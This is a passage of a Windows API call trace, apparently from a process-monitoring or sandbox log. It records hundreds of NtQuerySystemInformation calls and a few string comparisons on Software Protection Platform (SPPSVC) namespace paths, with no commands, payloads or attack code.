NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0280.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0280.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0280.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0280.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0280.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0280.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0280.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0280.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0280.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0280.838] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaf0, Length=0x28, ResultLength=0x0) [0280.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0280.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0280.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0280.851] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaf0, Length=0x28, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0280.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0280.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0280.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0280.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fceb0, Length=0x28, ResultLength=0x0) [0280.865] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0280.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0280.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0280.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcda0, Length=0x28, ResultLength=0x0) [0280.865] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0280.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) 